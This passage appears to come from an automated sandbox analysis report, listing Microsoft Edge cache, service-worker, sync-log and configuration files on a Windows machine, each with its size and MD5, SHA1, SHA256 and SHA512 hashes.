                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\89e5f9b6-f9a2-47d2-a29f-557ecbc4c789\index-dir\the-real-index
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  72B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  842f24ebfa902a83d478892ec5ea70da

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7159ac4eb1038e2539444f4730648eda2eaa5119

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1de52d814c107496aa7355ae512ff0a25e474c7ba4f2a8b12eab86174d7cb5de

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  41aa288363e049a83bafdd174f65bf34c9c17b9f382fe623c8cad1ab6a96d4b5f19f3368e5e6c6251df5c98cd2ef9ec07415879aa69ec72cd78e5501d43ae7c5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\89e5f9b6-f9a2-47d2-a29f-557ecbc4c789\index-dir\the-real-index
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  72B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ac155ab616bec4ea778f5d8fc0f7f543

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9bd91dbd7b249231fa62e84637d93e17deb75631

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  61bb3b0f68b9f0fd417a8ac49b3c7255870fd67b9fc3efc2529af361515daeca

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ff478c5ae17dfe8c9c07f3b8358e84652c4acfaef1055d96ef389494763172776eb5e4009bbccc67683a8bc68fb6e19abd7cd965b4543ef772a1506c1248a562

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  322B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e2c1568b521c96b596e900d25c72acf1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  df63ea843cbd3cd3d9e0835c911f7c5fc82c40ff

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b9ea957fb22ea5b07d4b4fe528ef30cf8e4e6dbf76b33678ae4fafb51ac2b220

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f3d96a73d68238a1884b024a8b3161e76f137a9783cc8e095b4dddf68b61e90b4f1d69a66c6fd0c3281e17a7b9f173698b3aaf295e02320527d1356225a1a5c2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  327B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6f02a1d13e32c3aa8872a13c1cadbf46

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8d27a8a9fdcaecaef8e18fbd90efcbc10411b338

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ba15fcafde9e73b1cb1cd7e52d1de274a8aadfc3a08877b6e92a428afe04a531

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9ec5674130faf853594ce3f81554a890d942e1460a689fcc7ba2a6c5805c429f3fba6b3ab468d49ee2e0996b14838abcc93233bcf36e27479484dbf03b6e5969

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\c02d92c21a1041fdacc219d920cfe5fb2eb28a9f\1300f06d-f080-4d1b-9bf8-8ab8b76b2a57\index-dir\the-real-index
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  12ea8628751eace98071374416f22ad5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  984178f958ac69f178cc4eac925a783cd1b075a3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  949c1c8f4c4d726b404a0c997da97d9ee1df1eeadf4d4135722bd1978aa9d5e1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6289e29ab09213253121d63feca77318d6e7f93b5ae01653daf4d3c95916b82f3f34f136631f8958cde6919f735f65abd812dc4747511c3043e74d0fbb45d2e4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\c02d92c21a1041fdacc219d920cfe5fb2eb28a9f\1300f06d-f080-4d1b-9bf8-8ab8b76b2a57\index-dir\the-real-index~RFe58bd8e.TMP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  48B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3942377045e09231493bbda34b4bd6ea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6c950b5caaa4988136ea679b704f36066a665c95

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6adb6c77d0f1779abbc49e663d210ae37c2ccac80943edc3e63923ba3072a469

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  095e2289e31244be41a2e6da008b6ac7a66a4e5c5e0a4e5072376259cd539a52e1c4b1ebcd1c28434dda5ff39b773642c801145101dd70853f499066f31ca866

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\c02d92c21a1041fdacc219d920cfe5fb2eb28a9f\index.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  137B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3c6db172bc63fcf3a2cc4dfa4dc1264c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  30a2ae40539ebfa7387969c37de6a0fb78b775b7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  21754b0c67d8bdedfedb4d64a467bcd3f00d03b616b9883666f59be8ae5ff517

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  abb1f913a035dd0ddd34201754263e09f094d638c0cb16c99a003b0f56e1d98810319b99291a369cf10fe7a543a515b4e7de23ae5c848c83028f381b160eaff5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\c02d92c21a1041fdacc219d920cfe5fb2eb28a9f\index.txt~RFe58bdbd.TMP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  137B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9b8ad9c948901b2b034402555f85854b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d4d3b0895f83f7a87549ca0846bd87cd49f13b9c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b6f73c4f7f313de40fe07c5e5f85f1b2257e9c9abbca68aea752006c0562ef3e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ce08e8039e8b2c1257d12f1dc3ca4f5fbb32e02d6b3ca3e7b7e42fcac727e936f309867aef44ea0cebdab520ee1e6d431f54a309e20cf565e4bdb5ae2ffc4da5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\fa813c9ad67834ac_0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  152KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5389bf220183b8ecfcd8d988b0bd4197

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  823cff851d892c0f59abf511ec6c67c543c560e7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d7103c849d397dfdf0a31dd9c3d09d6c7749db5c2e060d58ea2284f3df40313f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a6ba000fe16431759f6c9ccfdf8f51b3e3e4754add948ff0ac428b7b97447e34bb18c424af6ede4548737b78319a9dab62bbdc5158ed8b19507d032e9dbe74b7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\fa813c9ad67834ac_1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  238KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e088b39e7db2f2102a31a299022d9abb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6137021e7d36c6449b102bf70440b4f61cb696ad

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  75b4c1f833243b3ea930f8dd779b0bb461e0ed0fba6be3f47057ed18a7b44a79

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6d8b1c077a8c464afe350e3d49439799510657ad9812e7a11fa5832c27f7310bb5d59bbe89e4e325e8cc4966fa7557128ef5c1fb8e884ceb38069507b29a8fc2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  01dc8d5abe0b6e52b79a40b0eeff001a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  de60be4889ac8b9f7e21692c3c6e44d50a159dd2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  742a380fc4b8fb88c26e3ca2ea8f8633c1ae5681d44c7b09a2242e03b14c8498

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  258f08ee39042ee99f38d42c82ac09e919c26e2b9930e7efa48b2499436b69edebb4b271bc5863340abd5c6008f6931389430ac5f71a33e8df1f65c37a237c85

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  96B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d533ab506f9156d7d663e7cb26ebd006

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  450d0a0920cbf67abcc47fdc99c3afba8d0a9ad2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e574103daf31c08725c438e064e2de2be7edb43a1ee6eedfe3f0fbbd30523374

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5e1789820369e0924a6fd05af19674d7703ff94455606932cd12ded43ac15d8d55319cc9289cf832bc0aa7ab9c86cc08eb8ad9f85b6be3d84789de4f2f47ffba

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d6c3.TMP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  48B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0f35c859f890ab682ddc8e74a03d9f51

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1e5ea1d74fafb57fc31a0cc02e503d87f56ed8d3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b621808604a682fb780b7b292a389e84f5b43d9e57f169ca4f3d64bb9432a6d3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2eca4bea0ee424cff2fa234f6876f1b7a20c4a11026e303251d8881cc44bbd03215e88fd48b8b139ff4c74cac23671d9f16b6bc95eabdae8f62ac80f08ca98d2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  22KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8f91c74919742e26fb852ee151004822

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9d45595b914e2f1423f5e3d4f6ea5244c8205fac

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  85d6b56b246adc8eb7ef2990e9d7c7a966d96acc856040d6077b85cdc0217d3d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7ff5818ba1063f2956724c76d3e07a69436673cdd96f11c017ece2f91b0af525c7cf2920ee6d85f3c97a9896d0b865a7f5a7570205d8bef4abbe5d8fe38577d9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  900B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4c5509861aac82ffa9eab10f43dd04bf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  33799b33c8853d13fbe7b9015c8b41fe3c1a3749

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  13c037fc0280448a0e7a2e6a713c2d0ee632fa159932fbc2433d5b6941fb15e0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  63b5f788ddf1206af08a40ef81238f1372b63407da9e04885cfca2a2f08df0b994b603c8b560bd31a5f049c6441e9c97db170cfb444f7759f0b9ecf2d81be606

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  23KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  99f252632581d87150a21b6ba9ed304e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8321cebdd5563614fb14061fc19801538b092ea9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2d31f5f54a41445985ed200f37383dc4467e61d2de46756eaaf42fe3695d7153

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  04b20e8fa74fa9ae6ea547fe58d2d76b516133c976454969642d5a76f0e50b926360491ba0fcbd6eae64bdf2ce5e1ff443fbb826ae17c345e5908772ac20269a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  467B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  faa0334e34474bac1476fdf4e65c3088

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bbe2143de5b58226dcefa2fb1ed6538f54fbfd2c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3d4c24db27e9a2e2bf9738effe909d0dfad89a436cd8851d4a7cba4f730e0f1c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  708d980659c3cc71c31249627bbf3272b0a516a44e1ac19a9ee29730fd4cecc8a75efd641d1c6ffffed7b13d8ddb5b8aedb473a10a9a9febcd66724026b65f69

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  19KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  41c1930548d8b99ff1dbb64ba7fecb3d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d8acfeaf7c74e2b289be37687f886f50c01d4f2f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  545725f557cd605eea10e38b3a5e7b42

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f640506dd060f9dbc1a617aad914f7593b695d6e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b83e9adafc4c2ecfe9db29b6f937b2c4437a21953fc0512cd63183505e839806

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3b8e9d6f97afa0724fe1708124c4f878fef2076c1436bc1c6fae18798fd6b66a46678342a1b7e6fc7fcf5bb5458cc984a9213f4bb6db7395e96924eb71baa72d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  49KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  03a76d381d105ab0d033fb5d328712ea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5596533d63f7939fbf2280d2cc80056cfec6f15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bcfc8793f6693b012c2991a2716070f75e82dfda470af002a632787561e3117a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

